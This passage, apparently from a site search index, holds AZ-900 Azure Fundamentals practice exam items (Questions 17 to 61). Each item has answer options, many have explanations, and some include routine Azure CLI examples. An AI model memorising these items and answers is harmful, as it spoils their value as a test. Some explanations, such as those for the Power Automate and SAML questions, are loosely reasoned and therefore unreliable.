        Azure AD does support SAML, OAuth 2.0, and OpenID Connect authentication protocols. However,\u00a0NTLM\u00a0is not supported by Azure AD. NTLM is a legacy authentication protocol that is not recommended for modern authentication scenarios due to its security limitations. Azure AD recommends using modern authentication protocols such as SAML, OAuth 2.0, and OpenID Connect, which provide stronger security and support features such as multi-factor authentication and conditional access. Therefore, the correct answer is NTLM.

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-18-which-of-the-following-is-an-offline-tier-optimized-for-storing-data-that-is-rarely-accessed-and-that-has-flexible-latency-requirements","title":"Question 18:\u00a0Which of the following is an offline tier optimized for storing data that is rarely accessed, and that has flexible latency requirements?","text":"
        • Cool Tier
        • Infrequent Tier
        • Hot Tier
        • Archive Tier

        Data stored in the cloud grows at an exponential pace. To manage costs for your expanding storage needs, it can be helpful to organize your data based on how frequently it will be accessed and how long it will be retained. Azure storage offers different access tiers so that you can store your blob data in the most cost-effective manner based on how it's being used. Azure Storage access tiers include:

        • Hot tier\u00a0- An online tier optimized for storing data that is accessed or modified frequently. The Hot tier has the highest storage costs, but the lowest access costs.
        • Cool tier\u00a0- An online tier optimized for storing data that is infrequently accessed or modified. Data in the Cool tier should be stored for a minimum of 30 days. The Cool tier has lower storage costs and higher access costs compared to the Hot tier.
        • Archive tier\u00a0- An offline tier optimized for storing data that is rarely accessed, and that has flexible latency requirements, on the order of hours. Data in the Archive tier should be stored for a minimum of 180 days.
        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-19-___-brings-signals-together-to-make-decisions-and-enforce-organizational-policies-in-simple-terms-they-are-if-then-statements-if-a-user-wants-to-access-a-resource-then-they-must-complete-an-action","title":"Question 19:\u00a0___ brings signals together, to make decisions, and enforce organizational policies. In simple terms, they are if-then statements, if a user wants to access a resource, then they must complete an action.","text":"
        • Demand Access
        • Logical Access
        • Conditional Access
        • Active Directory Access

        The modern security perimeter now extends beyond an organization's network to include user and device identity. Organizations can use identity-driven signals as part of their access control decisions. Conditional Access brings signals together, to make decisions, and enforce organizational policies. Azure AD Conditional Access is at the heart of the new identity-driven control plane.

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-20-which-of-the-following-services-can-you-use-to-calculate-your-estimated-hourly-or-monthly-costs-for-using-azure","title":"Question 20: Which of the following services can you use to calculate your estimated hourly or monthly costs for using Azure?","text":"
        • Azure Total Cost of Ownership (TCO)\u00a0calculator
        • Azure Pricing Calculator
        • Azure Calculator
        • Azure Cost Management

        You can use the\u00a0Azure Pricing Calculator\u00a0to calculate your estimated hourly or monthly costs for using Azure.\u00a0Azure TCO\u00a0on the other hand is primarily used to estimate the cost savings you can realize by migrating your workloads to Azure.

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-21-which-of-the-following-protocols-is-used-for-federated-authentication-in-azure-ad","title":"Question 21:\u00a0Which of the following protocols is used for federated authentication in Azure AD?","text":"
        • LDAP
        • OpenID Connect
        • OAuth 2.0
        • SAML

        SAML (Security Assertion Markup Language)\u00a0is the protocol used for federated authentication in Azure AD. Federated authentication is a mechanism that allows users to use their existing credentials from a trusted identity provider (IdP) to authenticate with another application or service. In the context of Azure AD, federated authentication allows users to use their existing corporate credentials to authenticate with cloud-based applications and services. Azure AD supports several federated authentication protocols, including Security Assertion Markup Language (SAML), OAuth 2.0, and OpenID Connect. SAML is widely used for federated authentication in enterprise environments, while OAuth 2.0 and OpenID Connect are commonly used in web and mobile applications. Reference: https://docs.microsoft.com/en-us/azure/active-directory/develop/single-sign-on-saml-protocol

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-22-the-microsoft-_______-provides-a-variety-of-content-tools-and-other-resources-about-microsoft-security-privacy-and-compliance-practices","title":"Question 22: The Microsoft _______ provides a variety of content, tools, and other resources about Microsoft security, privacy, and compliance practices.","text":"
        • Privacy Policy
        • Blueprints
        • Service Trust Portal
        • Advisor

        The Microsoft Service Trust Portal provides a variety of content, tools, and other resources about Microsoft security, privacy, and compliance practices. The Service Trust Portal contains details about Microsoft's implementation of controls and processes that protect our cloud services and the customer data therein. To access some of the resources on the Service Trust Portal, you must log in as an authenticated user with your Microsoft cloud services account (Azure Active Directory organization account) and review and accept the Microsoft Non-Disclosure Agreement for Compliance Materials.

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-23-which-of-the-following-can-help-you-automate-deployments-and-use-the-practice-of-infrastructure-as-code","title":"Question 23:\u00a0Which of the following can help you automate deployments and use the practice of infrastructure as code?","text":"
        • Management Groups
        • ARM\u00a0Templates
        • Azure Arc
        • Azure IaaC

        To implement infrastructure as code for your Azure solutions, use\u00a0Azure Resource Manager templates (ARM templates).\u00a0The template is a JavaScript Object Notation (JSON) file that defines the infrastructure and configuration for your project. The template uses declarative syntax, which lets you state what you intend to deploy without having to write the sequence of programming commands to create it. In the template, you specify the resources to deploy and the properties for those resources.
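
        For instance, a declarative template file is deployed with a single CLI call; azuredeploy.json and its parameter are assumed names:

        ```bash
        # Deploy the declarative template; Resource Manager works out the ordering
        # and only creates or updates what is needed to reach the described state.
        az deployment group create --resource-group demo-rg \
          --template-file azuredeploy.json \
          --parameters storagePrefix=demo
        ```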

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-24-yes-or-no-it-is-possible-to-deploy-a-new-azure-virtual-network-vnet-using-powerautomate-on-a-google-chromebook","title":"Question 24:\u00a0Yes or No: It is possible to deploy a new Azure Virtual Network (VNet) using PowerAutomate on a Google Chromebook.","text":"
        • No
        • Yes

        No, Power Automate is not a part of Azure; it is part of the Microsoft Power Platform.

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-25-___-is-a-unified-cloud-native-application-protection-platform-that-helps-strengthen-your-security-posture-enables-protection-against-modern-threats-and-helps-reduce-risk-throughout-the-cloud-application-lifecycle-across-multicloud-and-hybrid-environments","title":"Question 25: ___ is a unified cloud-native application protection platform that helps strengthen your security posture, enables protection against modern threats, and helps reduce risk throughout the cloud application lifecycle across multicloud and hybrid environments.","text":"
        • Azure Bastion
        • Azure Firewall
        • Microsoft Priva
        • Microsoft Defender for Cloud
        • Azure Network Security Group

        From the official documentation:\u00a0Microsoft Defender for Cloud is a unified cloud-native application protection platform that helps strengthen your security posture, enables protection against modern threats, and helps reduce risk throughout the cloud application lifecycle across multicloud and hybrid environments.

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-26-__-infrastructure-as-code-involves-writing-scripts-in-languages-like-bash-or-powershell-you-explicitly-state-commands-that-are-executed-to-produce-a-desired-outcome","title":"Question 26:\u00a0__ Infrastructure as Code\u00a0involves writing scripts in languages like Bash or PowerShell. You explicitly state commands that are executed to produce a desired outcome.","text":"
        • Declarative
        • Imperative
        • Ad-Hoc
        • Defined

        There are two approaches you can take when implementing Infrastructure as Code.

        • Imperative Infrastructure as Code\u00a0involves writing scripts in languages like Bash or PowerShell. You explicitly state commands that are executed to produce a desired outcome. When you use imperative deployments, it's up to you to manage the sequence of dependencies, error control, and resource updates.
        • Declarative Infrastructure as Code\u00a0involves writing a definition that defines how you want your environment to look. In this definition, you specify a desired outcome rather than how you want it to be accomplished. The tooling figures out how to make the outcome happen by inspecting your current state, comparing it to your target state, and then applying the differences.
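
        To make the contrast concrete, a minimal imperative sketch in Bash (assumed names): each command is an explicit step you sequence yourself, unlike a declarative template that only states the end state:

        ```bash
        #!/usr/bin/env bash
        set -euo pipefail

        # Imperative IaC: you state the commands and own their ordering,
        # error handling, and updates.
        az group create --name demo-rg --location westeurope
        az storage account create --name demostorage12345 \
          --resource-group demo-rg --sku Standard_LRS
        ```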
        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-27-which-of-these-approaches-is-not-a-cost-saving-solutions","title":"Question 27:\u00a0Which of these approaches is NOT a cost saving solutions?","text":"
        • Use Reserved Instances with Azure Hybrid
        • Load balancing the incoming traffic
        • Use the correct and appropriate instance size based on current workload
        • Making use of Azure Cost Management

        Load balancing is done to increase the overall availability of the application, not to optimize costs.

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-28-______-infrastructure-as-code-involves-writing-a-definition-that-defines-how-you-want-your-environment-to-look-in-this-definition-you-specify-a-desired-outcome-rather-than-how-you-want-it-to-be-accomplished","title":"Question 28: ______ Infrastructure as Code\u00a0involves writing a definition that defines how you want your environment to look. In this definition, you specify a desired outcome rather than how you want it to be accomplished.","text":"
        • Ad-Hoc
        • Imperative
        • Declarative
        • Defined
        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-29-which-of-the-following-can-you-use-to-set-spending-thresholds","title":"Question 29:\u00a0Which of the following can you use to set spending thresholds?","text":"
        • Azure Cost Management +\u00a0Billing
        • Azure TCO
        • Azure Policy
        • Azure Pricing Calculator
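
        The answer is Azure Cost Management + Billing. A hedged sketch of creating a spending threshold with the Azure CLI's consumption commands (assumed name and dates; the exact command surface may vary by CLI version):

        ```bash
        # Create a monthly cost budget of $500 on the current subscription.
        az consumption budget create --budget-name monthly-cap \
          --amount 500 --category cost --time-grain monthly \
          --start-date 2024-06-01 --end-date 2025-06-01
        ```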
        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-30-which-of-the-following-azure-compliance-certifications-is-specifically-designed-for-the-healthcare-industry","title":"Question 30:\u00a0Which of the following Azure compliance certifications is specifically designed for the healthcare industry?","text":"
        • ISO 27001
        • GDPR
        • None of the above
        • HIPAA/HITECH
        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-31-which-of-the-following-can-help-you-manage-multiple-azure-subscriptions","title":"Question 31:\u00a0Which of the following can help you manage multiple Azure Subscriptions?","text":"
        • Policies
        • Management Groups
        • Resource Groups
        • Blueprints

        Each management group contains one or more subscriptions. Azure arranges management groups in a single hierarchy. You define this hierarchy in your Azure Active Directory (Azure AD) tenant to align with your organization's structure and needs.
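
        A short sketch (assumed group name and subscription ID) of building that hierarchy with the Azure CLI:

        ```bash
        # Create a management group and place a subscription under it.
        az account management-group create --name platform-mg
        az account management-group subscription add \
          --name platform-mg --subscription "<subscription-id>"
        ```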

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-32-in-the-_-as-a-service-cloud-service-model-customers-are-responsible-for-managing-applications-data-runtime-middleware-and-operating-systems-while-the-cloud-provider-manages-the-underlying-infrastructure","title":"Question 32:\u00a0In the _ as a Service cloud service model, customers are responsible for managing applications, data, runtime, middleware, and operating systems, while the cloud provider manages the underlying infrastructure.","text":"
        • Infrastructure
        • Platform
        • Software
        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-33-when-a-blob-is-in-the-archive-access-tier-what-must-you-do-first-before-accessing-it","title":"Question 33:\u00a0When a blob is in the archive access tier, what must you do first before accessing it?","text":"
        • Rehydrate it
        • Modify its policy
        • Add it to a new resource group
        • Move it to File Storage
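
        The correct answer is to rehydrate it. A sketch, assuming a storage account mystorageacct and blob backups/archive.tar, of rehydrating by moving the blob back to an online tier:

        ```bash
        # Rehydrate an archived blob by changing its tier; this can take hours
        # depending on the chosen rehydration priority.
        az storage blob set-tier --account-name mystorageacct --auth-mode login \
          --container-name backups --name archive.tar \
          --tier Hot --rehydrate-priority Standard
        ```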
        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-34-your-company-has-deployed-a-web-application-to-azure-and-you-want-to-restrict-access-to-it-from-the-internet-while-allowing-access-from-your-companys-on-premises-network-which-network-security-group-nsg-rule-would-you-configure","title":"Question 34:\u00a0Your company has deployed a web application to Azure, and you want to restrict access to it from the internet while allowing access from your company's on-premises network. Which Network Security Group (NSG) rule would you configure?","text":"
        • Inbound rule allowing traffic from any source to the web application's public IP address.
        • Inbound rule allowing traffic from your company's on-premises network to the web application's private IP address.
        • Outbound rule allowing traffic from any destination to your company's on-premises network.
        • Outbound rule allowing traffic from the web application's private IP address to any destination.
        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-35-which-of-the-following-can-help-you-download-cost-and-usage-data-that-was-used-to-generate-your-monthly-invoice","title":"Question 35:\u00a0Which of the following can help you download cost and usage data that was used to generate your monthly invoice?","text":"
        • Azure Monitor
        • Azure Cost Management
        • Azure Advisor
        • Azure Resource Manager

        Cost Management + Billing is a suite of tools provided by Microsoft that help you analyze, manage, and optimize the costs of your workloads. Using the suite helps ensure that your organization is taking advantage of the benefits provided by the cloud. You use Cost Management + Billing features to:

        • Conduct billing administrative tasks such as paying your bill
        • Manage billing access to costs
        • Download cost and usage data that was used to generate your monthly invoice
        • Proactively apply data analysis to your costs
        • Set spending thresholds
        • Identify opportunities for workload changes that can optimize your spending
        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-36-____-asynchronously-replicates-the-same-applications-and-data-across-other-azure-regions-for-disaster-recovery-protection","title":"Question 36:\u00a0____ asynchronously replicates the same applications and data across other Azure regions for disaster recovery protection.","text":"
        • Cross-region replication
        • Auto-Region Replication
        • Auto-Region Replicas
        • Across-Region Replication

        Cross-region replication is one of several important pillars in the Azure business continuity and disaster recovery strategy. Cross-region replication builds on the synchronous replication of your applications and data that exists by using availability zones within your primary Azure region for high availability. Cross-region replication asynchronously replicates the same applications and data across other Azure regions for disaster recovery protection. Some Azure services take advantage of cross-region replication to ensure business continuity and protect against data loss. Azure provides several\u00a0storage solutions\u00a0that make use of cross-region replication to ensure data availability. For example,\u00a0Azure geo-redundant storage\u00a0(GRS) replicates data to a secondary region automatically. This approach ensures that data is durable even if the primary region isn't recoverable.
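
        For example, geo-redundant replication is selected simply through the storage account SKU (assumed names):

        ```bash
        # Standard_GRS asynchronously copies data to the paired secondary region.
        az storage account create --name demogrsaccount --resource-group demo-rg \
          --location westeurope --sku Standard_GRS
        ```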

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-37-you-want-to-ensure-that-all-virtual-machines-deployed-in-your-azure-environment-are-configured-with-specific-antivirus-software-which-azure-service-can-you-use-to-enforce-this-policy","title":"Question 37:\u00a0You want to ensure that all virtual machines deployed in your Azure environment are configured with specific antivirus software. Which Azure service can you use to enforce this policy?","text":"
        • Azure Security Center
        • Azure Policy
        • Azure Monitor
        • Azure Advisor
        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-38-which-of-the-following-is-not-a-benefit-of-using-azure-arc","title":"Question 38:\u00a0Which of the following is NOT a benefit of using Azure Arc?","text":"
        • Centralized billing and cost management for all resources
        • Improved security and compliance for resources
        • Increased visibility and control over resources
        • Consistent management of resources across hybrid environments

        Azure Arc is a hybrid management service that allows you to manage your servers, Kubernetes clusters, and applications across on-premises, multi-cloud, and edge environments. Some of the benefits of using Azure Arc include consistent management of resources across hybrid environments, improved security and compliance for resources, and increased visibility and control over resources. Centralized billing and cost management for all resources is not a benefit of using Azure Arc: while Azure provides centralized billing and cost management for resources in the cloud, Azure Arc is focused on managing resources across hybrid environments and does not provide billing or cost management features.

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-39-yes-or-no-in-a-public-cloud-model-you-get-dedicated-hardware-storage-and-network-devices-than-the-other-organizations-or-cloud-tenants","title":"Question 39:\u00a0Yes or No: In a Public Cloud model, you get dedicated hardware, storage, and network devices than the other organizations or cloud \u201ctenants\".","text":"
        • Yes
        • No
        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-40-azure-pay-as-you-go-is-an-example-of-which-cloud-expenditure-model","title":"Question 40:\u00a0Azure Pay As you Go is an example of which cloud expenditure model?","text":"
        • Operational (OpEx)
        • Capital (CapEx)
        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-41-which-of-the-following-endpoints-for-a-managed-instance-enables-data-access-to-your-managed-instance-from-outside-a-virtual-network","title":"Question 41:\u00a0Which of the following endpoints for a managed instance enables data access to your managed instance from outside a virtual network?","text":"
        • Hybrid
        • External
        • Private
        • Public

        Public endpoint for a\u00a0managed instance\u00a0enables data access to your managed instance from outside the\u00a0virtual network. You are able to access your managed instance from multi-tenant Azure services like Power BI, Azure App Service, or an on-premises network. By using the public endpoint on a managed instance, you do not need to use a VPN, which can help avoid VPN throughput issues.

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-42-which-of-the-following-services-can-help-applications-absorb-unexpected-traffic-bursts-which-prevents-servers-from-being-overwhelmed-by-a-sudden-flood-of-requests","title":"Question 42:\u00a0Which of the following services can help applications absorb unexpected traffic bursts, which prevents servers from being overwhelmed by a sudden flood of requests?","text":"
        • Azure Decouple Storage
        • Azure Table Storage
        • Azure Queue Storage
        • Azure Message Storage

        Azure Queue Storage\u00a0is a service for storing large numbers of messages. You access messages from anywhere in the world via authenticated calls using HTTP or HTTPS. A queue message can be up to 64 KB in size. A queue may contain millions of messages, up to the total capacity limit of a storage account. Queues are commonly used to create a backlog of work to process asynchronously.
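
        A minimal sketch of the pattern with the Azure CLI (assumed account and queue names, RBAC-based auth): producers enqueue messages during a burst and workers drain them at their own pace:

        ```bash
        # Create the queue, enqueue a message, then dequeue it from a worker.
        az storage queue create --name orders --account-name mystorageacct --auth-mode login
        az storage message put --queue-name orders --content "order-42" \
          --account-name mystorageacct --auth-mode login
        az storage message get --queue-name orders \
          --account-name mystorageacct --auth-mode login
        ```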

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-43-in-which-scenario-would-you-use-the-business-to-business-b2b-collaboration-feature-in-azure-ad","title":"Question 43:\u00a0In which scenario would you use the Business-to-Business (B2B) collaboration feature in Azure AD?","text":"
        • Providing internal access to company reports.
        • Granting external vendors access to a shared project workspaces
        • Enabling employees to access internal applications.
        • Allowing customers to sign up for your e-commerce website.

        Business-to-Business (B2B) collaboration in Azure AD is used to collaborate with users external to your organization, such as vendors or partners. It allows you to securely share resources like documents and applications while maintaining control over access.

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-44-which-of-the-following-best-describes-azure-arc","title":"Question 44:\u00a0Which of the following best describes Azure Arc?","text":"
        • A platform for building microservices-based applications that run across multiple nodes
        • A bridge that extends the Azure platform to help you build apps with the flexibility to run across datacenters
        • A service for analyzing and visualizing large datasets in the cloud
        • A cloud-based identity and access management service

        Azure Arc\u00a0is a service from Microsoft that allows organizations to manage and govern their on-premises servers, Kubernetes clusters, and applications using Azure management tools and services. With Azure Arc, customers can use Azure services such as Azure Policy, Azure Security Center, and Azure Monitor to manage their resources across on-premises, multi-cloud, and edge environments. Azure Arc also enables customers to deploy and manage Azure services on-premises or on other clouds using the same tools and APIs as they use in Azure.

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-45-__-is-a-security-framework-that-uses-the-principles-of-explicit-verification-least-privileged-access-and-assuming-breach-to-keep-users-and-data-secure-while-allowing-for-common-scenarios-like-access-to-applications-from-outside-the-network-perimeter","title":"Question 45:\u00a0__ is a security framework that uses the principles of explicit verification, least privileged access, and assuming breach to keep users and data secure while allowing for common scenarios like access to applications from outside the network perimeter.","text":"
        • Least Trust
        • No Trust
        • Zero Trust
        • Less Trust
        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-46-yes-or-no-it-is-possible-to-have-multiple-subscriptions-inside-a-management-group","title":"Question 46:\u00a0Yes or No: It is possible to have multiple Subscriptions inside a Management Group.","text":"
        • Yes
        • No
        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-47-a-_______-endpoint-is-a-network-interface-that-uses-a-private-ip-address-from-your-virtual-network","title":"Question 47: A _______ endpoint is a network interface that uses a private IP address from your virtual network.","text":"
        • Public
        • Internal
        • Private
        • Hybrid

        A private endpoint\u00a0is a network interface that uses a private IP address from your virtual network. This network interface connects you privately and securely to a service that's powered by Azure Private Link. By enabling a private endpoint, you're bringing the service into your virtual network.
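
        A sketch of wiring a private endpoint to a Key Vault over Private Link (all names are assumed):

        ```bash
        # Create a private endpoint in the VNet's default subnet that connects
        # privately to an existing Key Vault.
        KV_ID=$(az keyvault show --name demo-kv --query id --output tsv)
        az network private-endpoint create --resource-group demo-rg --name kv-pe \
          --vnet-name demo-vnet --subnet default \
          --private-connection-resource-id "$KV_ID" \
          --group-id vault --connection-name kv-conn
        ```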

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-48-you-are-the-lead-architect-of-your-organization-one-of-the-teams-has-a-requirement-to-copy-hundreds-of-tbs-of-data-to-azure-storage-in-a-secure-and-efficient-manner-the-data-can-be-ingested-one-time-or-an-ongoing-basis-for-archival-scenarios-which-of-the-following-would-be-a-good-solution-for-this-use-case","title":"Question 48:\u00a0You are the lead architect of your organization. One of the teams has a requirement to copy hundreds of TBs of data to Azure storage in a secure and efficient manner. The data can be ingested one time or an ongoing basis for archival scenarios. Which of the following would be a good solution for this use case?","text":"
        • Azure Data Lake Storage
        • Azure Cosmos DB
        • Azure File Sync
        • Azure Data Box
        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-49-which-of-the-following-two-storage-solutions-are-built-to-handle-nosql-data","title":"Question 49:\u00a0Which of the following two storage solutions are built to handle NoSQL data?","text":"
        • Azure SQL\u00a0Database
        • Azure Table Storage
        • Azure NoSQL\u00a0Database
        • Azure Cosmos DB

        Azure Table storage\u00a0is a service that stores non-relational structured data (also known as structured NoSQL data) in the cloud, providing a key/attribute store with a schemaless design. Because Table storage is schemaless, it's easy to adapt your data as the needs of your application evolve. Azure Cosmos DB\u00a0is a fully managed NoSQL database for modern app development. Single-digit millisecond response times, and automatic and instant scalability, guarantee speed at any scale.
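
        A quick sketch of provisioning both NoSQL options (assumed names; table auth via account key or Azure AD as configured):

        ```bash
        # Schemaless key/attribute store inside an existing storage account.
        az storage table create --name inventory --account-name mystorageacct

        # Fully managed NoSQL database account.
        az cosmosdb create --name demo-cosmos --resource-group demo-rg
        ```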

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-50-which-of-the-following-services-can-host-the-following-type-of-apps-web-apps-api-apps-webjobs-mobile-apps","title":"Question 50:\u00a0Which of the following services can host the following type of apps: Web apps, API apps, WebJobs, Mobile apps","text":"
        • Azure App Service
        • Azure App Environment
        • Azure Bastion
        • Azure Arc
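
        The answer is Azure App Service. A minimal sketch (assumed names) of hosting a web app on it:

        ```bash
        # App Service hosts web apps, API apps, WebJobs, and mobile app back ends.
        az appservice plan create --name demo-plan --resource-group demo-rg --sku B1
        az webapp create --name demo-webapp-12345 --resource-group demo-rg --plan demo-plan
        ```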
        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-51-yes-or-no-subscriptions-can-be-moved-to-another-management-group-as-well-as-merged-into-one-single-subscription","title":"Question 51:\u00a0Yes or No: Subscriptions can be moved to another Management Group as well as merged into one Single subscription.","text":"
        • No
        • Yes

        Even though subscriptions can be moved to another management group, they cannot be merged into a single subscription.

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-52-______-lets-you-extend-your-on-premises-networks-into-the-microsoft-cloud-over-a-private-connection-with-the-help-of-a-connectivity-provider","title":"Question 52:\u00a0______ lets you extend your on-premises networks into the Microsoft cloud over a private connection with the help of a connectivity provider.","text":"
        • Azure DNS
        • Azure Sentinel
        • Azure ExpressRoute
        • Azure Virtual Network
        • Azure Firewall
        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-53-azure-cosmosdb-is-an-example-of-a-_______-offering","title":"Question 53:\u00a0Azure CosmosDB\u00a0is an example of a _______ offering.","text":"
        • Software as a Service (SaaS)
        • Platform as a Service (PaaS)
        • Infrastructure as a Service (IaaS)
        • Serverless Computing
        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-54-yes-or-no-azure-cosmos-db-is-a-software-as-a-service-saas-offering-from-microsoft-azure","title":"Question 54:\u00a0Yes or No: Azure Cosmos DB is a\u00a0Software as a Service (SaaS)\u00a0offering from Microsoft Azure.","text":"
        • No, it is a PaaS\u00a0offering.
        • No, it is an IaaS\u00a0offering.
        • Yes, it is a SaaS\u00a0offering.
        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-55-which-of-the-following-is-the-foundation-for-building-enterprise-data-lakes-on-azure-and-is-built-on-top-of-azure-blob-storage","title":"Question 55: Which of the following is the foundation for building enterprise data lakes on Azure AND\u00a0is built on top of Azure Blob storage?","text":"
        • Azure Data Lake Storage Gen4
        • Azure Data Lake Storage Gen3
        • Azure Data Lake Storage Gen1
        • Azure Data Lake Storage Gen2

        Azure Data Lake Storage Gen2 is a set of capabilities dedicated to big data analytics, built on\u00a0Azure Blob Storage. Data Lake Storage Gen2 converges the capabilities of\u00a0Azure Data Lake Storage Gen1\u00a0with Azure Blob Storage. For example, Data Lake Storage Gen2 provides file system semantics, file-level security, and scale. Because these capabilities are built on Blob storage, you'll also get low-cost, tiered storage, with high availability/disaster recovery capabilities. Reference: https://docs.microsoft.com/en-us/azure/storage/blobs/data-lake-storage-introduction

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-56-someone-in-your-organization-accidentally-deleted-an-important-virtual-machine-that-has-led-to-huge-revenue-losses-your-senior-management-has-tasked-you-with-investigating-who-was-responsible-for-the-deletion-which-azure-service-can-you-leverage-for-this-task","title":"Question 56:\u00a0Someone in your organization accidentally deleted an important Virtual Machine that has led to huge revenue losses. Your senior management has tasked you with investigating who was responsible for the deletion. Which Azure service can you leverage for this task?","text":"
        • Azure Service Health
        • Azure Arc
        • Azure Monitor
        • Azure Advisor
        • Azure Event Hubs

        The Azure Activity Log, part of Azure Monitor, records who performed management operations such as deleting a virtual machine. Log Analytics is a tool in the Azure portal that's used to edit and run log queries with data in Azure Monitor Logs. You might write a simple query that returns a set of records and then use features of Log Analytics to sort, filter, and analyze them. Or you might write a more advanced query to perform statistical analysis and visualize the results in a chart to identify a particular trend. Whether you work with the results of your queries interactively or use them with other Azure Monitor features, such as log query alerts or workbooks, Log Analytics is the tool that you'll use to write and test them.

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-57-true-or-false-azure-dns-can-manage-dns-records-for-your-azure-services-but-cannot-provide-dns-for-your-external-resources","title":"Question 57:\u00a0True or False: Azure DNS can manage DNS records for your Azure services, but cannot provide DNS for your external resources.","text":"
        • False
        • True

        Azure DNS can manage DNS records for your Azure services\u00a0and provide DNS for your external resources as well.\u00a0Azure DNS is integrated in the Azure portal and uses the same credentials, support contract, and billing as your other Azure services. DNS billing is based on the number of DNS zones hosted in Azure and on the number of DNS queries received. To learn more about pricing, see\u00a0Azure DNS pricing.
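
        For instance, the same zone type serves both Azure-hosted and external resources (example.com and the address below are placeholders):

        ```bash
        # Host a public DNS zone and add an A record pointing at any resource,
        # inside or outside Azure.
        az network dns zone create --resource-group demo-rg --name example.com
        az network dns record-set a add-record --resource-group demo-rg \
          --zone-name example.com --record-set-name www --ipv4-address 203.0.113.10
        ```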

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-58-_______-is-a-strategy-that-employs-a-series-of-mechanisms-to-slow-the-advance-of-an-attack-thats-aimed-at-acquiring-unauthorized-access-to-information-each-layer-provides-protection-so-that-if-one-layer-is-breached-a-subsequent-layer-is-already-in-place-to-prevent-further-exposure","title":"Question 58:\u00a0_______\u00a0is a strategy that employs a series of mechanisms to slow the advance of an attack that's aimed at acquiring unauthorized access to information. Each layer provides protection so that if one layer is breached, a subsequent layer is already in place to prevent further exposure.","text":"
        • Defense in Depth
        • Defense in Steps
        • Defense in Layers
        • Defense in Series
        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-59-which-of-the-following-is-not-a-feature-of-azure-monitor","title":"Question 59:\u00a0Which of the following is NOT a feature of Azure Monitor?","text":"
        • Log Analytics
        • Database management
        • Metrics
        • Alerts
        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-60-true-or-false-when-you-cancel-an-azure-subscription-a-resource-lock-can-block-the-subscription-cancellation","title":"Question 60:\u00a0True or False: When you cancel an Azure subscription, a Resource Lock can block the subscription cancellation.","text":"
        • True
        • False

        When you cancel an Azure subscription:

        • A resource lock doesn't block the subscription cancellation.
        • Azure preserves your resources by deactivating them instead of immediately deleting them.
        • Azure only deletes your resources permanently after a waiting period.
        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-61-yes-or-no-each-virtual-network-can-have-only-one-vpn-gateway","title":"Question 61:\u00a0Yes or No: Each virtual network can have only one VPN gateway.","text":"
        • No
        • Yes

